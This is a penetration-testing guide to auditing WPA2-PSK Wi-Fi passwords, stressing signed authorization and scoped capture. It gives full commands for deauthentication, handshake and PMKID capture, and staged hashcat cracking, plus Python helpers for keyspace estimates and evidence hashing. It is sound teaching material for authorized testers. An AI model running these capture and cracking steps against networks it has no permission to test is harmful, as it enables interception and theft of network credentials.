WPA2-PSK password auditing is one of the most requested items on a wireless pentest scope — and one of the most legally mishandled. This guide walks the entire process from authorization paperwork through hashcat mode 22000 to a defensible findings report. Every step assumes you are operating with written permission. If you are not, stop here.
Step 0: Authorization — The Step That Keeps You Out of Prison
The Computer Fraud and Abuse Act (USA), Computer Misuse Act (UK), and equivalent legislation in virtually every jurisdiction treat unauthorized network access and traffic interception as criminal offenses. A WPA2 deauth attack and handshake capture against a network you do not own, without documented permission, is prosecutable regardless of intent.
Before touching any hardware, you need two documents signed by someone with authority over the target network:
- Scope of Work (SoW) — names the specific SSIDs, BSSIDs (MAC addresses), physical locations, and time windows in scope. Anything not listed is out of scope.
- Rules of Engagement (RoE) — specifies allowed techniques (passive capture, active deauth, PMKID, dictionary attack), data handling obligations, and who to call if you accidentally hit something you shouldn't.
Keep signed originals on file. Carry a PDF copy on the device you're using for capture. If challenged on-site by security or law enforcement, produce it immediately. Many pentesters use a single-page "Get Out of Jail" letter summarizing the engagement — your client's security contact name, mobile number, and a one-sentence authorization statement. Print it, laminate it, carry it.
Shared spaces require extra care. Cafes, co-working spaces, and office buildings with multiple tenants often have overlapping RF environments. If nearby SSIDs are not in your scope document, ensure your capture and deauth commands are strictly filtered to your target BSSID. Impacting other networks — even accidentally — can trigger legal exposure for both you and your client.
Step 1: Hardware and Environment Setup
Monitor mode and packet injection require a chipset that supports them. The driver stack on most laptops' built-in adapters does not. Recommended adapters:
- Alfa AWUS036AXML — Wi-Fi 6 (802.11ax), MediaTek MT7921AU chipset, USB-C, ~$50. Excellent Linux driver support via mt7921u in kernel 5.18+.
- Alfa AWUS036ACM — Wi-Fi 5, MT7612U, ~$35. Rock-solid for WPA2 work, slightly lower throughput ceiling.
- Hak5 WiFi Coconut — 14 simultaneous channels, purpose-built for capture, ~$100. Overkill for single-AP audits but excellent for site surveys.
Operating system: Kali Linux 2024.x or Parrot OS are the most practical choices — hcxdumptool, hcxpcapngtool, aircrack-ng, and hashcat are all packaged. A bare-metal install or a dedicated VM with USB passthrough both work. Avoid WSL2 — USB adapter passthrough is unreliable.
Step 2: Capture — Two Methods
Method A: Classic 4-Way Handshake with airodump-ng
This method captures the WPA2 4-way handshake when a client authenticates. You can wait passively for a natural connection event, or accelerate it with a targeted deauth frame (only do so if deauth is explicitly permitted in your RoE, and only against the specific BSSID/client pairs listed in scope).
```bash
# 1. Kill interfering processes, then enable monitor mode
airmon-ng check kill
airmon-ng start wlan0

# 2. Survey — note target BSSID and channel
airodump-ng wlan0mon

# 3. Targeted capture (replace values with your authorized target)
airodump-ng -c 11 \
  --bssid AA:BB:CC:DD:EE:FF \
  -w /captures/acme-office \
  wlan0mon
# Watch top-right for "WPA handshake: AA:BB:CC:DD:EE:FF"

# 4. Optional deauth to force reauthentication (if authorized)
aireplay-ng --deauth 5 \
  -a AA:BB:CC:DD:EE:FF \
  -c 11:22:33:44:55:66 \
  wlan0mon
```
Method B: PMKID Capture with hcxdumptool (Preferred)
The PMKID attack, published by Jens Steube (hashcat author) in 2018, extracts a crackable hash directly from the AP's EAPOL association response — no connected client required. This is now the standard method because it is faster, more reliable, and fully passive on the AP side.
```bash
# hcxdumptool — modern PMKID + handshake capture
# Create a filter file containing only your authorized BSSID(s)
echo "AABBCCDDEEFF" > /captures/scope.txt

# Run capture, filtered to scope
hcxdumptool \
  -i wlan0mon \
  -o /captures/acme-pmkid.pcapng \
  --filterlist_ap=/captures/scope.txt \
  --filtermode=2 \
  --enable_status=1
# --filtermode=2 = capture ONLY listed BSSIDs (whitelist)
# Run for 2–5 minutes; Ctrl+C when PMKID appears in status output

# Convert pcapng to hashcat 22000 format
hcxpcapngtool \
  -o /captures/acme.hc22000 \
  /captures/acme-pmkid.pcapng
```
Always use --filtermode=2 with a BSSID whitelist. Without it, hcxdumptool will attempt PMKID extraction against every visible AP. That means actively probing networks outside your scope — a legal problem even if you never attempt to crack the results. The filter flag is a one-line safeguard; use it every time.
Step 3: Crack with Hashcat Mode 22000
Hashcat mode 22000 (WPA-PMKID-PBKDF2) replaced the deprecated mode 2500 (.hccapx) and handles both PMKID hashes and 4-way handshake hashes in the same file. Feed it the .hc22000 output from hcxpcapngtool.
Attack progression matters. Start fast and cheap, escalate to expensive only if needed:
```bash
# Stage 1: Dictionary attack (rockyou.txt — 14M entries, ~12 sec on RTX 4090)
hashcat -m 22000 \
  /captures/acme.hc22000 \
  /wordlists/rockyou.txt \
  --status --status-timer=10

# Stage 2: Dictionary + best64 rules (transforms: l33tspeak, capitalization, etc.)
hashcat -m 22000 \
  /captures/acme.hc22000 \
  /wordlists/rockyou.txt \
  -r /usr/share/hashcat/rules/best64.rule

# Stage 3: Hybrid — dictionary word + 2-digit suffix (common: "Password23")
hashcat -m 22000 \
  /captures/acme.hc22000 \
  /wordlists/rockyou.txt \
  -a 6 \
  ?d?d

# Stage 4: Targeted brute-force — 8-char mask: six lowercase letters, then two digits
hashcat -m 22000 \
  /captures/acme.hc22000 \
  -a 3 ?l?l?l?l?l?l?d?d

# Show cracked result
hashcat -m 22000 /captures/acme.hc22000 --show
```
On an RTX 4090, WPA2 (PBKDF2-HMAC-SHA1 with 4096 iterations) runs at roughly 1.2 million hashes/second. Cracking a full rockyou.txt dictionary takes about 12 seconds. An 8-character lowercase+digit keyspace (~2.8 trillion combinations) would take weeks — which is exactly the point you make in the report when the password falls in stage 1.
| Attack Type | Speed (RTX 4090) | Wordlist / Keyspace | Typical Duration |
|---|---|---|---|
| Dictionary (rockyou.txt) | 1.2M H/s | 14.3M words | ~12 seconds |
| Dictionary + best64 rules | 1.2M H/s | ~900M candidates | ~12 minutes |
| Hybrid dict + ?d?d | 1.2M H/s | ~1.4B candidates | ~20 minutes |
| Brute-force 8-char ?l?d | 1.2M H/s | ~2.8T candidates | ~27 days |
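The durations in the table are the remediation argument, so it is worth deriving them from the mask rather than quoting them. The following is an added example (not from the original guide or from hashcat itself): it parses a hashcat `-a 3` mask, including `-1`..`-4` custom charsets, and converts the keyspace to worst-case days at the 1.2M H/s figure quoted above.

```python
import string
from typing import Dict, Optional
# hashcat's built-in charsets ?l ?u ?d ?s; ?a is the union of all four (95 characters)
BUILTIN = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "s": " " + string.punctuation,  # 33 characters, same set as hashcat's ?s
}
BUILTIN["a"] = "".join(BUILTIN.values())

def expand_charset(definition: str, custom: Dict[str, str]) -> str:
    """Expand a charset definition such as '?l?d' or 'abc?d' into its characters."""
    chars, i = [], 0
    while i < len(definition):
        if definition[i] == "?" and i + 1 < len(definition):
            nxt = definition[i + 1]
            if nxt in BUILTIN:
                chars.extend(BUILTIN[nxt])
            elif nxt in custom:            # ?1..?4 refer to the -1..-4 custom charsets
                chars.extend(expand_charset(custom[nxt], custom))
            elif nxt == "?":               # '??' is a literal question mark
                chars.append("?")
            else:
                raise ValueError(f"unknown charset ?{nxt}")
            i += 2
        else:                              # any other character is a literal
            chars.append(definition[i])
            i += 1
    return "".join(dict.fromkeys(chars))   # deduplicate: -1 ?l?l still has 26 members

def mask_keyspace(mask: str, custom: Optional[Dict[str, str]] = None) -> int:
    """Candidates covered by an `-a 3` mask: product of the charset size at each position."""
    custom, total, i = custom or {}, 1, 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            total *= len(expand_charset(mask[i:i + 2], custom))
            i += 2
        else:                              # literal position: exactly one choice
            i += 1
    return total
def days_to_exhaust(candidates: int, hashes_per_second: float) -> float:
    return candidates / hashes_per_second / 86400
RTX_4090_WPA2_HS = 1.2e6   # mode 22000 rate quoted in the guide above
if __name__ == "__main__":
    for label, mask, custom in [
        ("Stage 4 mask as written (26^6 x 10^2)", "?l?l?l?l?l?l?d?d", None),
        ("36-character alphabet in all 8 positions (-1 ?l?d)", "?1?1?1?1?1?1?1?1", {"1": "?l?d"}),
    ]:
        n = mask_keyspace(mask, custom)
        print(f"{label}: {n:.3g} candidates, {days_to_exhaust(n, RTX_4090_WPA2_HS):.3g} days")
```

Running it shows that the Stage 4 mask as written (six ?l then two ?d) is about 31 billion candidates, roughly seven hours, while the ~2.8 trillion figure in the text and table corresponds to all 36 lowercase-plus-digit characters in every position, i.e. `-1 ?l?d ?1?1?1?1?1?1?1?1`. State the exact mask and the computed keyspace in the finding so the time-to-crack claim is reproducible.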
Step 4: Safe Handling of Results
The recovered plaintext password is sensitive data. Treat it accordingly:
- Encrypt at rest — store the .hc22000 file and any cracked output on an encrypted volume (LUKS, VeraCrypt). Do not store on cloud drives not explicitly authorized by the client.
- Redact in client-facing deliverables — the report body shows the password length, character class breakdown, and time-to-crack. The actual plaintext goes in a password-protected PDF appendix delivered separately to the named security contact only.
- Retention and destruction — agree a retention period in the RoE (typically 30–90 days post-engagement). After that period, securely wipe the capture files and cracked hashes. Document the destruction date.
- Change notification — the first action item after delivery is immediate password rotation. Make this explicit in the report executive summary.
Step 5: Documenting Findings for a Formal Audit Report
A WPA2 crack result is only useful if it translates into a documented, actionable finding. Auditors and compliance reviewers need to see methodology, not just outcome. A well-structured finding entry includes:
Finding Structure
- Finding ID & Title — e.g. WIFI-001: Weak WPA2-PSK Pre-Shared Key
- Severity — Critical (password cracked in <60 seconds), High (cracked <24 hours), Medium (cracked <7 days), Low (not cracked within attack window)
- Affected Asset — SSID name, BSSID, physical location
- Evidence — timestamp of capture, hashcat command line used, wordlist name and SHA-256 hash (for reproducibility), time-to-crack, hardware spec
- Regulatory Mapping — ISO 27001 A.8.20 (Networks Security), NIS2 Art. 21 (security of network and information systems), SOC 2 CC6.6 (logical access controls)
- Remediation — migrate to WPA3-Personal (SAE) where hardware supports it; if WPA2-only, enforce a PSK of ≥20 random characters from a password manager, or migrate to WPA2-Enterprise with 802.1X authentication
- Remediation Effort — Low (router admin panel change, <30 min) to Medium (WPA3 hardware refresh, 1–2 weeks)
Use wifiaudit.io to generate the compliance report automatically. Upload your .pcapng capture via the API and receive a structured PDF with SSID analysis, protocol audit, PMKID exposure status, regulatory control mappings, and severity-ranked remediation recommendations — in under two minutes. The report is formatted for direct inclusion in formal audit deliverables.
Common Mistakes That Invalidate Findings
Even technically solid work can be thrown out if the process is sloppy. Reviewers and legal teams look for:
- No chain of custody — if you cannot prove the capture file was not modified between collection and analysis, the finding is contestable. Hash your .pcapng immediately after capture:

  ```bash
  sha256sum capture.pcapng > capture.pcapng.sha256
  ```

  and include both in your deliverable.
- Undated or unsigned authorization — a screenshot of a Slack message does not constitute written authorization. Use a PDF with a wet or DocuSign signature and a date.
- Out-of-scope captures in the file — if your .pcapng contains EAPOL frames from BSSIDs not listed in scope (because you forgot the whitelist filter), some clients will refuse to accept the report. Always filter.
- Wordlist not documented — "we ran a dictionary attack" is not enough. Name the wordlist, version, and source URL. Reproducibility is a core audit requirement.
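The chain-of-custody and wordlist-documentation points above both come down to recording file hashes at collection time and re-checking them before delivery. As an added example (not from the original guide), the following Python tool writes a timestamped evidence manifest with the SHA-256 of each file and later re-verifies it, reporting modified or missing files; the file names and engagement id in `demo()` are constructed.

```python
import hashlib
import json
import tempfile
from datetime import datetime, timezone
from pathlib import Path

def sha256_file(path: Path) -> str:
    """Stream the file through SHA-256 so multi-GB captures do not need to fit in RAM."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()

def write_manifest(files, manifest_path: Path, engagement: str, operator: str) -> dict:
    """Record name, size and SHA-256 of every evidence file plus a UTC timestamp."""
    manifest = {
        "engagement": engagement,
        "operator": operator,
        "recorded_at": datetime.now(timezone.utc).isoformat(),
        "files": [{"file": str(p), "size": Path(p).stat().st_size,
                   "sha256": sha256_file(Path(p))} for p in files],
    }
    manifest_path.write_text(json.dumps(manifest, indent=2))
    return manifest

def verify_manifest(manifest_path: Path) -> list:
    """Re-hash every listed file; return a list of problems (empty means custody holds)."""
    manifest = json.loads(manifest_path.read_text())
    problems = []
    for entry in manifest["files"]:
        path = Path(entry["file"])
        if not path.exists():
            problems.append(f"{path.name}: missing")
        elif sha256_file(path) != entry["sha256"]:
            problems.append(f"{path.name}: SHA-256 mismatch, file changed since capture")
    return problems

def demo() -> dict:
    """Constructed sample run: manifest written, then one file tampered and one deleted."""
    d = Path(tempfile.mkdtemp())
    cap, wl = d / "acme-pmkid.pcapng", d / "rockyou.txt"   # constructed, not real evidence
    cap.write_bytes(b"constructed pcapng placeholder")
    wl.write_text("password\n123456\n")
    manifest = d / "evidence-manifest.json"
    write_manifest([cap, wl], manifest, "WIFI-AUDIT-EXAMPLE (constructed)", "tester")
    clean = verify_manifest(manifest)
    cap.write_bytes(b"constructed pcapng placeholder, modified")
    wl.unlink()
    return {"clean": clean, "after_tampering": verify_manifest(manifest)}
if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Include the manifest (and its own SHA-256) in the deliverable alongside the capture hash and the wordlist hash, so a reviewer can re-run the verification step independently.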
FAQ
Is cracking WPA2-PSK illegal?
Without explicit written authorization from the network owner, yes — it is illegal in virtually every jurisdiction. The interception of wireless frames and offline password cracking both fall under computer fraud statutes. With a signed SoW and RoE in hand, it is a standard and well-recognized penetration testing technique.
What hashcat mode is used for WPA2 cracking?
Mode 22000 (WPA-PMKID-PBKDF2). It handles both PMKID hashes and 4-way handshake hashes in the same .hc22000 file format, produced by hcxpcapngtool. The older mode 2500 (.hccapx) is deprecated — don't use it for new engagements.
How long does it take to crack a WPA2 password with hashcat?
On a single RTX 4090: a full rockyou.txt dictionary exhausts in about 12 seconds. Dictionary plus best64 rules takes roughly 12 minutes. A random 12+ character password mixing upper, lower, digits, and symbols is effectively out of reach with current consumer hardware — which is the remediation argument you put in the report.
How should WPA2 cracking results be documented in an audit report?
Document the exact command, wordlist name and SHA-256 hash, hardware spec, time-to-crack, and the recovered password length and character class breakdown. The plaintext itself goes in a password-protected confidential appendix. Map the finding to ISO 27001 A.8.20, NIS2 Art. 21, or SOC 2 CC6.6 as applicable, and include a severity rating and concrete remediation steps.
Turn Your Captures Into Compliance-Ready Reports
Upload a .pcapng or .cap file and get a structured PDF audit report with regulatory mappings, severity ratings, and remediation steps — ready to drop into your pentest deliverable.